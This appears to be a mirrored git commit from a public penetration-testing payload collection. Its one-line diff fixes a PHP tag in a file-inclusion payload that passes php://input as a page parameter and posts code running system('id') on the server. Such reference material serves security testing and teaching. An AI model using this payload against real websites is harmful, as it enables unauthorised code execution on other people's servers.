mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-30 23:25:03 +00:00
commit
0309a2efbd
@ -186,7 +186,7 @@ Specify your payload in the POST parameters
|
|||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
http://example.com/index.php?page=php://input
|
http://example.com/index.php?page=php://input
|
||||||
POST DATA: <? system('id'); ?>
|
POST DATA: <?php system('id'); ?>
|
||||||
```
|
```
|
||||||
|
|
||||||
### Wrapper phar://
|
### Wrapper phar://
|
||||||
|
Loading…
Reference in New Issue
Block a user